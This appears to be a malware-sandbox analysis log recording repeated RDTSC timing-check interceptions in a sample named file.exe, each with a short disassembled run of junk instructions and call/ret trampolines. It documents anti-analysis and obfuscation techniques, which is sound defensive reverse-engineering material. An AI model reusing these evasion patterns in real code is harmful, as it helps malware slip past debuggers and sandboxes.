Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78200D second address: 782011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7821AA second address: 7821B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780857 second address: 78085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7886AA second address: 7886AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787B7A second address: 787B9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F28C47EE2C5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787B9F second address: 787BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787D09 second address: 787D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787E6C second address: 787EBE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 jmp 00007F28C4758084h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F28C4758086h 0x00000017 js 00007F28C4758076h 0x0000001d pop eax 0x0000001e jg 00007F28C4758084h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F28C475807Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787EBE second address: 787ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F28C47EE2B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78801E second address: 788036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B0B2 second address: 78B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B52A second address: 78B530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B530 second address: 78B534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BB9F second address: 78BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BBA3 second address: 78BBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BC2E second address: 78BC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758084h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BC4C second address: 78BC53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BC53 second address: 78BC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F28C4758078h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F28C4758089h 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C6DB second address: 78C6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C6E0 second address: 78C6F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C6F4 second address: 78C6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E317 second address: 78E31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E31B second address: 78E321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DAC2 second address: 78DACC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E321 second address: 78E347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F28C47EE2B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E347 second address: 78E3C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F28C4758078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, D7C9h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F28C4758078h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 xor edi, dword ptr [ebp+122D186Eh] 0x0000004c mov dword ptr [ebp+122D339Dh], ecx 0x00000052 xchg eax, ebx 0x00000053 jc 00007F28C4758080h 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007F28C4758076h 0x00000062 popad 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 push edi 0x0000006a pop edi 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E3C8 second address: 78E3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 790545 second address: 790549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79100B second address: 791016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791016 second address: 79102C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F28C4758094h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7942DB second address: 7942EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7942EC second address: 7942F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7948A7 second address: 7948AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795973 second address: 795979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795979 second address: 795A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F28C47EE2B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F28C47EE2B8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add bx, C784h 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F28C47EE2B8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, 19B094FCh 0x00000068 sub dword ptr [ebp+124770D7h], ebx 0x0000006e xchg eax, esi 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795A05 second address: 795A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797908 second address: 797992 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F28C47EE2BFh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F28C47EE2B8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F28C47EE2C1h 0x00000031 push 00000000h 0x00000033 and ebx, 0D27BD1Ah 0x00000039 mov dword ptr [ebp+122D2EAFh], edx 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F28C47EE2B8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov dword ptr [ebp+12451D91h], eax 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797992 second address: 797996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798966 second address: 79896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7936DC second address: 7936E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7949EC second address: 7949FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79AA62 second address: 79AABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub ebx, dword ptr [ebp+122D29B2h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2B4Bh], ebx 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007F28C4758086h 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79AABE second address: 79AAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BA02 second address: 79BA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F28C4758099h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758087h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BA29 second address: 79BA2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796AA2 second address: 796AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796AA6 second address: 796AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BB61 second address: 79BB6B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8D2 second address: 79D8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BB6B second address: 79BB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8D7 second address: 79D8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8DD second address: 79D8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E91B second address: 79E925 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E925 second address: 79E9A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007F28C4758089h 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F28C4758078h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D26DFh], eax 0x00000032 push eax 0x00000033 movsx ebx, si 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 mov bx, si 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+124513BEh], ecx 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pop edx 0x00000049 pop edx 0x0000004a pop eax 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007F28C4758081h 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA64 second address: 79DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA68 second address: 79DA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA6C second address: 79DA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79CB01 second address: 79CB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79CB08 second address: 79CB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F8EE second address: 79F8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A086B second address: 7A086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A086F second address: 7A0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0873 second address: 7A0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0879 second address: 7A0883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0883 second address: 7A08A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2C1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0A6E second address: 7A0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4AB0 second address: 7A4AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F28C47EE2C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F28C47EE2C3h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 ja 00007F28C47EE2B6h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4AE4 second address: 7A4AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A50CC second address: 7A50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A50D0 second address: 7A50D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A50D4 second address: 7A515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F28C47EE2BBh 0x0000000e call 00007F28C47EE2C5h 0x00000013 jmp 00007F28C47EE2C7h 0x00000018 pop ebx 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c sub ebx, dword ptr [ebp+122D291Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F28C47EE2B8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e movsx edi, ax 0x00000041 xchg eax, esi 0x00000042 jno 00007F28C47EE2BEh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A515E second address: 7A5162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5162 second address: 7A516C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A516C second address: 7A5172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEFE3 second address: 7AEFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AEFE9 second address: 7AEFF3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF145 second address: 7AF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F28C47EE2C2h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF2E5 second address: 7AF2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF416 second address: 7AF422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2AA7 second address: 7B2AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2AB3 second address: 7B2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2AC0 second address: 7B2AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F28C4758078h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2AD3 second address: 7B2AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2BEF second address: 7B2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758082h 0x00000009 popad 0x0000000a jns 00007F28C475807Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F28C4758081h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2C2C second address: 7B2C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 743653 second address: 743665 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C475807Ah 0x0000000d rdtsc
